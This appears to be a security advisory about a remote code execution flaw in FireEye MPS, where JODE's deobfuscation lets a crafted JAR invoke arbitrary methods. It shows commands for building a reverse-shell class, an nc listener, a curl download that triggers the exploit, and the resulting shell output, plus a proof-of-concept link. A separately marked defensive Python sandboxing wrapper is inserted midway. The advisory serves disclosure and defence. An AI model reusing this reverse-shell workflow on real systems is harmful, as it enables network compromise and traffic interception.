
69 lines
No EOL
3.2 KiB
Text
Source: https://code.google.com/p/google-security-research/issues/detail?id=666
The FireEye MPS (Malware Protection System) is vulnerable to remote code execution simply from monitoring hostile traffic. FireEye is designed to operate as a passive network tap, so that it can see all the files and emails that enter a monitored network.
This vulnerability allows an attacker to compromise the FireEye device, get a root shell and start monitoring all traffic on the victim network (emails, attachments, downloads, web browsing, etc.). This is about the worst possible vulnerability that you can imagine for a FireEye user; it literally does not get worse than this.
This bug is in one of the analysis tools used by the MIP (Malware Input Processor), which has various tools for analysis of different file types. One of these tools is a script that attempts to decompile Java Archives, then runs some simple regexes over the decompiled code:
$ grep subprocess.Popen /opt/fireeye/scripts/mip/content/jar.py
        sp = subprocess.Popen(yara_cmd,stdout=outfile)
        sp = subprocess.Popen(cmd_list,stdout=outfile,stderr=errfile)
        sp = subprocess.Popen(jarsigner_cmd,stdout=outfile,stderr=errfile)

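The Popen calls above hand an attacker-supplied file to an external tool with no time limit, no resource limits and the parent's full environment. The wrapper below is an added example, not code from the advisory or from FireEye's jar.py; the function name and limits are assumed, and it assumes network and filesystem isolation (a container, namespace or seccomp policy) is provided outside it. It does not remove the underlying flaw, which is a decompiler that executes code from the file it analyses, but it bounds what a runaway or hostile tool can do.

```python
import resource
import subprocess


def _apply_limits(cpu_seconds, mem_bytes):
    """Runs in the child before exec: cap CPU time and address space, no core dumps."""
    for res, wanted in ((resource.RLIMIT_CPU, cpu_seconds),
                        (resource.RLIMIT_AS, mem_bytes),
                        (resource.RLIMIT_CORE, 0)):
        _soft, hard = resource.getrlimit(res)
        # setrlimit fails if we ask for more than the existing hard limit
        if hard != resource.RLIM_INFINITY:
            wanted = min(wanted, hard)
        resource.setrlimit(res, (wanted, wanted))


def run_analysis_tool(cmd, timeout=60, cpu_seconds=30, mem_bytes=1 << 30):
    """Run one analysis command (argv list, never a shell string) over untrusted input.

    Returns {'status': 'ok'|'timeout'|'failed', 'rc', 'stdout', 'stderr'}.
    Note: RLIMIT_AS is too blunt for a JVM tool such as a Java decompiler, which
    reserves a large address space up front; cap those with -Xmx instead.
    """
    def limits():
        _apply_limits(cpu_seconds, mem_bytes)

    try:
        proc = subprocess.run(
            cmd,
            shell=False,                    # argv only: file names are never shell-parsed
            stdin=subprocess.DEVNULL,       # the tool gets no interactive input
            capture_output=True,
            timeout=timeout,                # wall-clock cap; the child is killed on expiry
            env={"PATH": "/usr/bin:/bin"},  # do not leak the parent's environment
            preexec_fn=limits,
        )
    except subprocess.TimeoutExpired as e:
        return {"status": "timeout", "rc": None,
                "stdout": e.stdout or b"", "stderr": e.stderr or b""}
    except (OSError, subprocess.SubprocessError) as e:
        # tool missing or not executable, or the rlimit setup was rejected
        return {"status": "failed", "rc": None, "stdout": b"", "stderr": str(e).encode()}
    return {"status": "ok" if proc.returncode == 0 else "failed",
            "rc": proc.returncode, "stdout": proc.stdout, "stderr": proc.stderr}
```

Every call site in a script like jar.py should go through one such wrapper, so that a tool that hangs, forks or tries to stay resident is killed rather than left running as the analysis user.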
The decompiler used is actually a modified version of JODE, an ancient open-source decompiler written in Java:
http://jode.sourceforge.net/
Examining the source code for JODE shows that it supports a "String Deobfuscation" feature that relies on reflection; this is visible here:
http://sourceforge.net/p/jode/code/HEAD/tree/trunk/jode/src/net/sf/jode/expr/InvokeOperator.java
    public Object invokeMethod(Reference ref, boolean isVirtual,
                               Object cls, Object[] params)
        throws InterpreterException, InvocationTargetException {
        if (cls == null && ref.getClazz().equals(classSig)) {
            BasicBlocks bb = classInfo
                .findMethod(ref.getName(), ref.getType())
                .getBasicBlocks();
            if (bb != null)
                return interpreter.interpretMethod(bb, null, params);
            throw new InterpreterException
                ("Can't interpret static native method: "+ref);
        } else
            return super.invokeMethod(ref, isVirtual, cls, params);
    }
}

By carefully crafting a class file that passes JODE's test for obfuscation, we were able to invoke arbitrary methods using reflection. We did this using the jasmin compiler:
# create the hostile JAR
$ jasmin ReverseShell.j
$ jar cvf fireeye.jar ReverseShell.class
added manifest
adding: ReverseShell.class(in = 489) (out= 311)(deflated 36%)

# Now start a reverse shell listening
$ nc -lp 9090 &
[1] 11115

# download a file over the monitored network
$ curl http://192.168.1.1/appliance-test/fireeye.jar &> /dev/null

# wait for the connect back shell attempt
$ wait
uid=821(mip) gid=3111(mip) groups=3111(mip),602(antivirus),2000(analysis),3001(stats),3134(mip_child),3200(dipcshm),3203(reports),3204(contents),3210(mip_client)
[1]+ Done nc -lp 9090

# Code execution!

(Getting root from gid=mip_child is trivial; this is a second bug that will be filed.)
The Jasmin file we used is attached.
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39007.zip